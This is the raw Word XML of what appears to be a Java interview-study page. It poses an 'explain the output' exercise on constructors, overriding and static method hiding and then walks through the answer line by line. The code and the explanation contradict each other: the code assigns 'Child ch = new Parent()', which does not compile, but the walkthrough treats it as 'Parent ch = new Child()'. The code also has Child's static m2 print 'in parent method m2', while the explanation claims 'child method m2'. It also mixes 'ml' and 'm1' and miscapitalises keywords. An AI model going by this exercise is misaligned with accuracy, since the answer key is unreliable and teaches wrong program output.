          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>The space complexity O(n)O(n)O(n) is due to the hash map storing the indices of the elements as we traverse the array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0D3712" w14:textId="77777777" w:rsidR="00DB464B" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB464B" w:rsidP="00DB464B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Thus, this optimized approach provides significant improvements in both time and space efficiency compared to the naive approach.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C61D201" w14:textId="77777777" w:rsidR="00DB5DF3" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB5DF3" w:rsidP="00DB5DF3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0161FD93" w14:textId="0651492B" w:rsidR="005A767B" w:rsidRPr="00CE4B95" w:rsidRDefault="005A767B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="370" w:name="_Toc196307850"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="00B369F7" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain output</w:t>
      </w:r>
      <w:bookmarkEnd w:id="370"/>
    </w:p>
    <w:p w14:paraId="2749AF6B" w14:textId="688A62FD" w:rsidR="005A767B" w:rsidRPr="00CE4B95" w:rsidRDefault="005A767B" w:rsidP="005A767B">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="004B657F" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Explain the output line by line in below code?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6431D171"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88"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>class</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Parent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663CC0E7"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43C14A7D"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publ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Parent</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69537ED1"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4334F6DC"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System</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ou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println</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in parent Constructor"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EF3514"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30D43455"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publ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void</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> ml</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E86237"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090CC0CF"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System</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ou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println</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in parent method m1"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494D7D18"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3CC4EEE4"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publ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stat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void</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> m2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0D6D41"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20253AF2"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System</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ou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println</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in parent method m2"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5311B5"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40DB24A5"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3219AA41"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Class</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Child</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extends</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Parent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA55110"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6A23974B"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Publ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Child</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72701932"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51838428"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System</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ou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println</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in child Constructor"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D71C913"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513BAFE0"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publ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void</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> ml</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D6F345"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463FA889"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System</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ou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println</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in child method m1"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13315D06"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67CA6D11"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publ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stat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void</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> m2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC726BA"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02258996"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System</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ou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println</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in parent method m2"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751BF510"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4C956225"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19E3159D"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Class</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Main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C0D84A"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7C3667D2"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publ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stat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void</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> main </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>String</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args</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E39D46E"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1B976498"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Parent</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> p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Parent</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FACC86"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t>p</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ml</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4584F816"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t>p</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m2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192E41CE"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Child</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> c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Child</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9F3F33"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t>c</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ml</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E484651"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t>c</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m2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BE7383"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Child</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> ch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Parent</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46621326"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t>ch</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ml</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B85793D"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t>ch</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m2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A88EA3C"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Parent</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> pl</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Child</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418EC7CE"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t>pl</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ml</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D93F2AB"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t>pl</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m2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD152E0" w14:textId="77777777"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43DC57F3" w14:textId="1C76F968" w:rsidR="00704437" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DB6C7F" w14:textId="211DBF87" w:rsidR="005A767B" w:rsidRPr="00CE4B95" w:rsidRDefault="005A767B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42684D06" w14:textId="77777777" w:rsidR="003E5945" w:rsidRPr="00CE4B95" w:rsidRDefault="003E5945" w:rsidP="003E594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 of Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365FBBCB" w14:textId="77777777" w:rsidR="003E5945" w:rsidRPr="00CE4B95" w:rsidRDefault="003E5945">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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rent p = new Parent();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B421B5" w14:textId="77777777" w:rsidR="003E5945" w:rsidRPr="00CE4B95" w:rsidRDefault="003E5945">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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Parent constructor is invoked, so the output is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184A7F6F" w14:textId="77777777" w:rsidR="003E5945" w:rsidRPr="00CE4B95" w:rsidRDefault="003E5945" w:rsidP="003E59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parent Constructor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D07962B" w14:textId="77777777" w:rsidR="003E5945" w:rsidRPr="00CE4B95" w:rsidRDefault="003E5945">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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ml(); calls the ml() method of the Parent class because the object is of type Parent. The output is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578A4ED4" w14:textId="77777777" w:rsidR="003E5945" w:rsidRPr="00CE4B95" w:rsidRDefault="003E5945" w:rsidP="003E59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parent method ml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFF057D" w14:textId="77777777" w:rsidR="003E5945" w:rsidRPr="00CE4B95" w:rsidRDefault="003E5945">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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m2(); calls the static m2() method of the Parent class because the method is static. The output is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64958532" w14:textId="77777777" w:rsidR="003E5945" w:rsidRPr="00CE4B95" w:rsidRDefault="003E5945" w:rsidP="003E59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parent method m2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5723AE8C" w14:textId="77777777" w:rsidR="003E5945" w:rsidRPr="00CE4B95" w:rsidRDefault="003E5945">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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hild c = new Child();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEC1378" w14:textId="77777777" w:rsidR="003E5945" w:rsidRPr="00CE4B95" w:rsidRDefault="003E5945">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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Child constructor is invoked, which first calls the Parent constructor because the Child constructor implicitly calls super(). The output is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408EF0D2" w14:textId="77777777" w:rsidR="003E5945" w:rsidRPr="00CE4B95" w:rsidRDefault="003E5945" w:rsidP="003E59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in parent Constructor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B97E02" w14:textId="77777777" w:rsidR="003E5945" w:rsidRPr="00CE4B95" w:rsidRDefault="003E5945" w:rsidP="003E59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child Constructor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5523E4C6" w14:textId="77777777" w:rsidR="003E5945" w:rsidRPr="00CE4B95" w:rsidRDefault="003E5945">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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ml(); calls the ml() method of the Child class because the object is of type Child. The output is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01348D59" w14:textId="77777777" w:rsidR="003E5945" w:rsidRPr="00CE4B95" w:rsidRDefault="003E5945" w:rsidP="003E59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child method ml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581F49B3" w14:textId="77777777" w:rsidR="003E5945" w:rsidRPr="00CE4B95" w:rsidRDefault="003E5945">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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m2(); calls the static m2() method of the Child class because the reference type is Child. The output is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BCE082" w14:textId="77777777" w:rsidR="003E5945" w:rsidRPr="00CE4B95" w:rsidRDefault="003E5945" w:rsidP="003E59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child method m2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FDD1EA" w14:textId="77777777" w:rsidR="003E5945" w:rsidRPr="00CE4B95" w:rsidRDefault="003E5945">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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rent ch = new Child();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6ACD0E" w14:textId="77777777" w:rsidR="003E5945" w:rsidRPr="00CE4B95" w:rsidRDefault="003E5945">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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 you are upcasting a Child object to a Parent reference.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D2DDA4" w14:textId="4A066768" w:rsidR="003E5945" w:rsidRPr="00CE4B95" w:rsidRDefault="003E5945">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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h.ml(); calls the ml() method of the Child class because the method call is dynamic (runtime polymorphism), so the output is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158DB0BA" w14:textId="77777777" w:rsidR="003E5945" w:rsidRPr="00CE4B95" w:rsidRDefault="003E5945" w:rsidP="003E59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child method ml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C1825E" w14:textId="77777777" w:rsidR="003E5945" w:rsidRPr="00CE4B95" w:rsidRDefault="003E5945">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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h.m2(); calls the static m2() method of the Parent class because static methods are bound at compile time (static binding). The output is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508E38E1" w14:textId="77777777" w:rsidR="003E5945" w:rsidRPr="00CE4B95" w:rsidRDefault="003E5945" w:rsidP="003E59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parent method m2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B28F710" w14:textId="77777777" w:rsidR="003E5945" w:rsidRPr="00CE4B95" w:rsidRDefault="003E5945">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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rent pl = new Child();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9B0D28" w14:textId="77777777" w:rsidR="003E5945" w:rsidRPr="00CE4B95" w:rsidRDefault="003E5945">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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is also an upcast, similar to the previous case.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7054AA8B" w14:textId="77777777" w:rsidR="003E5945" w:rsidRPr="00CE4B95" w:rsidRDefault="003E5945">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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l.ml(); calls the ml() method of the Child class due to runtime polymorphism. The output is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2125D86C" w14:textId="77777777" w:rsidR="003E5945" w:rsidRPr="00CE4B95" w:rsidRDefault="003E5945" w:rsidP="003E59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child method ml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EC7C34" w14:textId="77777777" w:rsidR="003E5945" w:rsidRPr="00CE4B95" w:rsidRDefault="003E5945">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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l.m2(); calls the static m2() method of the Parent class due to static binding. The output is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEB3BCA" w14:textId="77777777" w:rsidR="003E5945" w:rsidRPr="00CE4B95" w:rsidRDefault="003E5945" w:rsidP="003E59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parent method m2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0161A54E" w14:textId="77777777" w:rsidR="003E5945" w:rsidRPr="00CE4B95" w:rsidRDefault="003E5945" w:rsidP="003E594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inal Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FD14AA" w14:textId="77777777" w:rsidR="003E5945" w:rsidRPr="00CE4B95" w:rsidRDefault="003E5945" w:rsidP="003E59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parent Constructor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380EB3FF" w14:textId="77777777" w:rsidR="003E5945" w:rsidRPr="00CE4B95" w:rsidRDefault="003E5945" w:rsidP="003E59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parent method ml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271C0964" w14:textId="77777777" w:rsidR="003E5945" w:rsidRPr="00CE4B95" w:rsidRDefault="003E5945" w:rsidP="003E59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parent method m2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A10D4D" w14:textId="77777777" w:rsidR="003E5945" w:rsidRPr="00CE4B95" w:rsidRDefault="003E5945" w:rsidP="003E59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parent Constructor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32884A38" w14:textId="77777777" w:rsidR="003E5945" w:rsidRPr="00CE4B95" w:rsidRDefault="003E5945" w:rsidP="003E59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child Constructor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31941AF0" w14:textId="77777777" w:rsidR="003E5945" w:rsidRPr="00CE4B95" w:rsidRDefault="003E5945" w:rsidP="003E59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child method ml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DA45CD" w14:textId="77777777" w:rsidR="003E5945" w:rsidRPr="00CE4B95" w:rsidRDefault="003E5945" w:rsidP="003E59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child method m2</w:t>
      </w:r>
    </w:p>
